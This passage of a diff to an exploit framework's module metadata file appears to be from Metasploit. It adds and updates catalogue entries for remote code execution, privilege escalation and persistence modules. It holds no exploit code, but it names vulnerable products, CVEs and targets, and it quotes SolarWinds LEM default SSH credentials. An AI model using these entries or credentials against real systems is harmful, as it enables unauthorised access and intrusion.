    "path": "/modules/auxiliary/scanner/vmware/vmware_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42988,7 +43257,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_screenshot_stealer",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -43038,7 +43307,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_server_dir_trav",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43088,7 +43357,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_update_manager_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43126,7 +43395,7 @@
    "path": "/modules/auxiliary/scanner/vnc/ard_root_pw.rb",
    "is_install_path": true,
    "ref_name": "scanner/vnc/ard_root_pw",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43174,7 +43443,7 @@
    "path": "/modules/auxiliary/scanner/vnc/vnc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vnc/vnc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43214,7 +43483,7 @@
    "path": "/modules/auxiliary/scanner/vnc/vnc_none_auth.rb",
    "is_install_path": true,
    "ref_name": "scanner/vnc/vnc_none_auth",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43292,7 +43561,7 @@
    "path": "/modules/auxiliary/scanner/vxworks/urgent11_check.rb",
    "is_install_path": true,
    "ref_name": "scanner/vxworks/urgent11_check",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43333,7 +43602,7 @@
    "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb",
    "is_install_path": true,
    "ref_name": "scanner/vxworks/wdbrpc_bootline",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43371,7 +43640,7 @@
    "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/vxworks/wdbrpc_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43420,7 +43689,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_auth_methods",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43469,7 +43738,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_cmd",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43518,7 +43787,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43567,7 +43836,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_wql",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43607,7 +43876,7 @@
    "path": "/modules/auxiliary/scanner/wproxy/att_open_proxy.py",
    "is_install_path": true,
    "ref_name": "scanner/wproxy/att_open_proxy",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43652,7 +43921,7 @@
    "path": "/modules/auxiliary/scanner/wsdd/wsdd_query.rb",
    "is_install_path": true,
    "ref_name": "scanner/wsdd/wsdd_query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43690,7 +43959,7 @@
    "path": "/modules/auxiliary/scanner/x11/open_x11.rb",
    "is_install_path": true,
    "ref_name": "scanner/x11/open_x11",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -46596,7 +46865,7 @@
    "path": "/modules/auxiliary/voip/asterisk_login.rb",
    "is_install_path": true,
    "ref_name": "voip/asterisk_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -46727,7 +46996,7 @@
    "path": "/modules/auxiliary/voip/sip_deregister.rb",
    "is_install_path": true,
    "ref_name": "voip/sip_deregister",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -46765,7 +47034,7 @@
    "path": "/modules/auxiliary/voip/sip_invite_spoof.rb",
    "is_install_path": true,
    "ref_name": "voip/sip_invite_spoof",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -49665,7 +49934,7 @@
    "targets": [
      "@(#)fingerd.c   5.1 (Berkeley) 6/6/85"
    ],
-    "mod_time": "2018-11-22 23:10:57 +0000",
+    "mod_time": "2019-12-23 19:02:13 +0000",
    "path": "/modules/exploits/bsd/finger/morris_fingerd_bof.rb",
    "is_install_path": true,
    "ref_name": "bsd/finger/morris_fingerd_bof",
@@ -51683,6 +51952,80 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/citrix_dir_traversal_rce": {
+    "name": "Citrix ADC (NetScaler) Directory Traversal RCE",
+    "fullname": "exploit/linux/http/citrix_dir_traversal_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-17",
+    "type": "exploit",
+    "author": [
+      "Project Zero India",
+      "TrustedSec",
+      "James Brytan",
+      "James Smith",
+      "Marisa Mack",
+      "Rob Vinson",
+      "Sergey Pashevkin",
+      "Steven Laura",
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka\n        NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.",
+    "references": [
+      "CVE-2019-19781",
+      "EDB-47901",
+      "EDB-47902",
+      "URL-https://support.citrix.com/article/CTX267027/",
+      "URL-https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/"
+    ],
+    "platform": "Python,Unix",
+    "arch": "python, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Python",
+      "Unix Command"
+    ],
+    "mod_time": "2020-01-14 10:46:04 +0000",
+    "path": "/modules/exploits/linux/http/citrix_dir_traversal_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/citrix_dir_traversal_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Shitrix"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/http/cpi_tararchive_upload": {
    "name": "Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability",
    "fullname": "exploit/linux/http/cpi_tararchive_upload",
@@ -56664,11 +57007,11 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2019-11-12 02:17:58 +0000",
+    "mod_time": "2019-12-03 10:39:58 +0000",
    "path": "/modules/exploits/linux/http/pulse_secure_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/pulse_secure_cmd_exec",
-    "check": false,
+    "check": true,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -58607,6 +58950,70 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/http/webmin_backdoor": {
+    "name": "Webmin password_change.cgi Backdoor",
+    "fullname": "exploit/linux/http/webmin_backdoor",
+    "aliases": [
+      "exploit/unix/webapp/webmin_backdoor"
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-08-10",
+    "type": "exploit",
+    "author": [
+      "AkkuS",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a backdoor in Webmin versions 1.890 through 1.920.\n        Only the SourceForge downloads were backdoored, but they are listed as\n        official downloads on the project's site.\n\n        Unknown attacker(s) inserted Perl qx statements into the build server's\n        source code on two separate occasions: once in April 2018, introducing\n        the backdoor in the 1.890 release, and in July 2018, reintroducing the\n        backdoor in releases 1.900 through 1.920.\n\n        Only version 1.890 is exploitable in the default install. Later affected\n        versions require the expired password changing feature to be enabled.",
+    "references": [
+      "CVE-2019-15107",
+      "URL-http://www.webmin.com/exploit.html",
+      "URL-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html",
+      "URL-https://blog.firosolutions.com/exploits/webmin/",
+      "URL-https://github.com/webmin/webmin/issues/947"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 10000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2020-01-16 14:46:00 +0000",
+    "path": "/modules/exploits/linux/http/webmin_backdoor.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/webmin_backdoor",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/webmin_packageup_rce": {
    "name": "Webmin Package Updates Remote Command Execution",
    "fullname": "exploit/linux/http/webmin_packageup_rce",
@@ -58656,6 +59063,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/wepresent_cmd_injection": {
+    "name": "Barco WePresent file_transfer.cgi Command Injection",
+    "fullname": "exploit/linux/http/wepresent_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-04-30",
+    "type": "exploit",
+    "author": [
+      "Jacob Baines"
+    ],
+    "description": "This module exploits an unauthenticated remote command injection\n        vulnerability found in Barco WePresent and related OEM'ed products.\n        The vulnerability is triggered via an HTTP POST request to the\n        file_transfer.cgi endpoint.",
+    "references": [
+      "CVE-2019-3929",
+      "EDB-46786",
+      "URL-https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, armle",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix In-Memory",
+      "Linux Dropper"
+    ],
+    "mod_time": "2020-01-14 07:52:30 +0000",
+    "path": "/modules/exploits/linux/http/wepresent_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/wepresent_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/wipg1000_cmd_injection": {
    "name": "WePresent WiPG-1000 Command Injection",
    "fullname": "exploit/linux/http/wipg1000_cmd_injection",
@@ -59131,7 +59589,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-01-16 15:04:57 +0000",
    "path": "/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/abrt_raceabrt_priv_esc",
@@ -59379,7 +59837,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-04-26 13:11:40 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/apt_package_manager_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/apt_package_manager_persistence",
@@ -59471,7 +59929,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-08-20 17:51:41 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/autostart_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/autostart_persistence",
@@ -59482,6 +59940,45 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/local/bash_profile_persistence": {
+    "name": "Bash Profile Persistence",
+    "fullname": "exploit/linux/local/bash_profile_persistence",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "1989-06-08",
+    "type": "exploit",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "\"\n          This module writes an execution trigger to the target's Bash profile.\n          The execution trigger executes a call back payload whenever the target\n          user opens a Bash terminal. A handler is not run automatically, so you\n          must configure an appropriate exploit/multi/handler to receive the callback.\n        \"",
+    "references": [
+      "URL-https://attack.mitre.org/techniques/T1156/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-01-14 20:47:27 +0000",
+    "path": "/modules/exploits/linux/local/bash_profile_persistence.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/bash_profile_persistence",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/local/blueman_set_dhcp_handler_dbus_priv_esc": {
    "name": "blueman set_dhcp_handler D-Bus Privilege Escalation",
    "fullname": "exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -59542,7 +60039,7 @@
      "jannh <jannh@google.com>",
      "h00die <mike@shorebreaksecurity.com>"
    ],
-    "description": "Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)\n        does not properly reference count file descriptors, resulting\n        in a use-after-free, which can be abused to escalate privileges.\n\n        The target system must be compiled with `CONFIG_BPF_SYSCALL`\n        and must not have `kernel.unprivileged_bpf_disabled` set to 1.\n\n        This module has been tested successfully on:\n\n        Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel);\n        Ubuntu 16.04 (x64) kernel 4.4.0-38-generic;\n        Ubuntu 16.04 (x64) kernel 4.4.0-42-generic;\n        Ubuntu 16.04 (x64) kernel 4.4.0-98-generic;\n        Ubuntu 16.04 (x64) kernel 4.4.0-140-generic.",
+    "description": "Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)\n        does not properly reference count file descriptors, resulting\n        in a use-after-free, which can be abused to escalate privileges.\n\n        The target system must be compiled with `CONFIG_BPF_SYSCALL`\n        and must not have `kernel.unprivileged_bpf_disabled` set to 1.\n\n        Note, this module will overwrite the first few lines\n        of `/etc/crontab` with a new cron job. The job will\n        need to be manually removed.\n\n        This module has been tested successfully on Ubuntu 16.04 (x64)\n        kernel 4.4.0-21-generic (default kernel).",
    "references": [
      "BID-90309",
      "CVE-2016-4557",
@@ -59567,7 +60064,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2018-12-15 05:39:50 +0000",
+    "mod_time": "2019-12-26 16:21:44 +0000",
    "path": "/modules/exploits/linux/local/bpf_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/bpf_priv_esc",
@@ -60261,7 +60758,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2020-01-16 15:04:57 +0000",
    "path": "/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/libuser_roothelper_priv_esc",
@@ -60347,16 +60844,21 @@
    "type": "exploit",
    "author": [
      "h00die <mike@stcyrsecurity.com>",
-      "vnik"
+      "vnik",
+      "Jesse Hertz",
+      "Tim Newsham"
    ],
-    "description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n          only works against Ubuntu 16.04 (not 16.04.1) with kernel\n          4.4.0-21-generic.\n          Several conditions have to be met for successful exploitation:\n          Ubuntu:\n          1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n          2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n          Kernel 4.4.0-31-generic and newer are not vulnerable.\n\n          We write the ascii files and compile on target instead of locally since metasm bombs for not\n          having cdefs.h (even if locally installed)",
+    "description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n          only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic.\n\n          Several conditions have to be met for successful exploitation:\n          Ubuntu:\n          1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n          2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n          Kernel 4.4.0-31-generic and newer are not vulnerable. This exploit does not bypass SMEP/SMAP.\n\n          We write the ascii files and compile on target instead of locally since metasm bombs for not\n          having cdefs.h (even if locally installed)",
    "references": [
      "EDB-40049",
      "CVE-2016-4997",
-      "URL-http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c"
+      "CVE-2016-4998",
+      "URL-https://www.openwall.com/lists/oss-security/2016/06/24/5",
+      "URL-http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91"
    ],
    "platform": "Linux",
-    "arch": "x86",
+    "arch": "x86, x64",
    "rport": null,
    "autofilter_ports": [

@@ -60367,7 +60869,7 @@
    "targets": [
      "Ubuntu"
    ],
-    "mod_time": "2018-10-10 14:12:29 +0000",
+    "mod_time": "2019-12-15 07:17:42 +0000",
    "path": "/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb",
    "is_install_path": true,
    "ref_name": "linux/local/netfilter_priv_esc_ipv4",
@@ -60375,6 +60877,12 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ]
    },
    "needs_cleanup": true
  },
@@ -60729,7 +61237,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-11-04 05:28:32 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/rc_local_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/rc_local_persistence",
@@ -60740,11 +61248,69 @@
    },
    "needs_cleanup": null
  },
-  "exploit_linux/local/rds_priv_esc": {
-    "name": "Reliable Datagram Sockets (RDS) Privilege Escalation",
-    "fullname": "exploit/linux/local/rds_priv_esc",
+  "exploit_linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc": {
+    "name": "Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation",
+    "fullname": "exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
    "aliases": [

+    ],
+    "rank": 400,
+    "disclosure_date": "2018-11-01",
+    "type": "exploit",
+    "author": [
+      "Mohamed Ghannam",
+      "Jann Horn",
+      "wbowling",
+      "bcoles <bcoles@gmail.com>",
+      "nstarke"
+    ],
+    "description": "This module attempts to gain root privileges on Linux systems by abusing\n        a NULL pointer dereference in the `rds_atomic_free_op` function in the\n        Reliable Datagram Sockets (RDS) kernel module (rds.ko).\n\n        Successful exploitation requires the RDS kernel module to be loaded.\n        If the RDS module is not blacklisted (default); then it will be loaded\n        automatically.\n\n        This exploit supports 64-bit Ubuntu Linux systems, including distributions\n        based on Ubuntu, such as Linux Mint and Zorin OS.\n\n        Target offsets are available for:\n\n        Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and\n        Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.\n\n        This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.\n        Failed exploitation may crash the kernel.\n\n        This module has been tested successfully on various 4.4 and 4.8 kernels.",
+    "references": [
+      "CVE-2018-5333",
+      "CVE-2019-9213",
+      "BID-102510",
+      "URL-https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4",
+      "URL-https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c",
+      "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2",
+      "URL-https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d",
+      "URL-https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c"
+    ],
+    "platform": "Linux",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-01-18 08:34:52 +0000",
+    "path": "/modules/exploits/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ]
+    },
+    "needs_cleanup": true
+  },
+  "exploit_linux/local/rds_rds_page_copy_user_priv_esc": {
+    "name": "Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation",
+    "fullname": "exploit/linux/local/rds_rds_page_copy_user_priv_esc",
+    "aliases": [
+      "exploit/linux/local/rds_priv_esc"
    ],
    "rank": 500,
    "disclosure_date": "2010-10-20",
@@ -60753,7 +61319,7 @@
      "Dan Rosenberg",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module exploits a vulnerability in the rds_page_copy_user function\n        in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8\n        to execute code as root (CVE-2010-3904).\n\n        This module has been tested successfully on Fedora 13 (i686) with\n        kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)\n        with kernel version 2.6.32-21-generic.",
+    "description": "This module exploits a vulnerability in the `rds_page_copy_user` function\n        in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8\n        to execute code as root (CVE-2010-3904).\n\n        This module has been tested successfully on:\n\n        Fedora 13 (i686) kernel version 2.6.33.3-85.fc13.i686.PAE; and\n        Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic.",
    "references": [
      "EDB-15285",
      "CVE-2010-3904",
@@ -60776,16 +61342,25 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
-    "path": "/modules/exploits/linux/local/rds_priv_esc.rb",
+    "mod_time": "2019-12-22 10:20:00 +0000",
+    "path": "/modules/exploits/linux/local/rds_rds_page_copy_user_priv_esc.rb",
    "is_install_path": true,
-    "ref_name": "linux/local/rds_priv_esc",
+    "ref_name": "linux/local/rds_rds_page_copy_user_priv_esc",
    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
      "AKA": [
        "rds-fail.c"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
      ]
    },
    "needs_cleanup": true
@@ -60834,6 +61409,53 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/local/reptile_rootkit_reptile_cmd_priv_esc": {
+    "name": "Reptile Rootkit reptile_cmd Privilege Escalation",
+    "fullname": "exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-10-29",
+    "type": "exploit",
+    "author": [
+      "f0rb1dd3n",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n        to gain root privileges using the `root` command.\n\n        This module has been tested successfully with Reptile from `master`\n        branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).",
+    "references": [
+      "URL-https://github.com/f0rb1dd3n/Reptile",
+      "URL-https://github.com/f0rb1dd3n/Reptile/wiki/Usage"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2019-12-11 06:48:51 +0000",
+    "path": "/modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/reptile_rootkit_reptile_cmd_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/local/service_persistence": {
    "name": "Service Persistence",
    "fullname": "exploit/linux/local/service_persistence",
@@ -61353,7 +61975,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-04-30 06:25:48 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/yum_package_manager_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/yum_package_manager_persistence",
@@ -62966,11 +63588,11 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-07-28 21:38:54 +0000",
+    "mod_time": "2019-12-09 20:09:52 +0000",
    "path": "/modules/exploits/linux/redis/redis_unauth_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/redis/redis_unauth_exec",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -63322,7 +63944,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 06:44:35 +0000",
    "path": "/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/smtp/exim_gethostbyname_bof",
@@ -63330,6 +63952,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "ghost"
+      ]
    },
    "needs_cleanup": null
  },
@@ -63366,7 +63991,7 @@
      "linux x64",
      "linux x86"
    ],
-    "mod_time": "2018-12-14 22:27:11 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/exploits/linux/smtp/haraka.py",
    "is_install_path": true,
    "ref_name": "linux/smtp/haraka",
@@ -63789,7 +64414,7 @@
    "needs_cleanup": null
  },
  "exploit_linux/ssh/solarwinds_lem_exec": {
-    "name": "SolarWind LEM Default SSH Password Remote Code Execution",
+    "name": "SolarWinds LEM Default SSH Password Remote Code Execution",
    "fullname": "exploit/linux/ssh/solarwinds_lem_exec",
    "aliases": [

@@ -63800,7 +64425,7 @@
    "author": [
      "Mehmet Ince <mehmet@mehmetince.net>"
    ],
-    "description": "This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH\n        service is accessed with the default username and password which is \"cmc\" and \"password\". By exploiting a\n        vulnerability that exist on the menuing script, an attacker can escape from restricted shell.\n\n        This module was tested against SolarWinds LEM v6.3.1.",
+    "description": "This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH\n        service is accessed with the default username and password which is \"cmc\" and \"password\". By exploiting a\n        vulnerability that exist on the menuing script, an attacker can escape from restricted shell.\n\n        This module was tested against SolarWinds LEM v6.3.1.",
    "references": [
      "CVE-2017-7722",
      "URL-http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/"
@@ -63817,7 +64442,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-08-15 21:27:40 +0000",
+    "mod_time": "2019-12-11 13:42:41 +0000",
    "path": "/modules/exploits/linux/ssh/solarwinds_lem_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/solarwinds_lem_exec",
@@ -64070,6 +64695,56 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/upnp/dlink_dir859_subscribe_exec": {
+    "name": "D-Link DIR-859 Unauthenticated Remote Command Execution",
+    "fullname": "exploit/linux/upnp/dlink_dir859_subscribe_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-24",
+    "type": "exploit",
+    "author": [
+      "Miguel Mendez Z., <Miguel Mendez Z., @s1kr10s>",
+      "Pablo Pollanco P."
+    ],
